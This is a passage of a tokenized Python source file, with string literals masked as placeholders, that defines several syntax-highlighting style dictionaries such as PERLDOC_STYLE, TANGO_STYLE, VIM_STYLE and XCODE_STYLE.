'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> PERLDOC_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> 
'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' 
, <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> RRT_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' 
, <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> TANGO_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : 
'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> TRAC_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> 
'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , 
<EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> VIM_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' 
, <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> VS_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : 
'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> 
'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> XCODE_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> 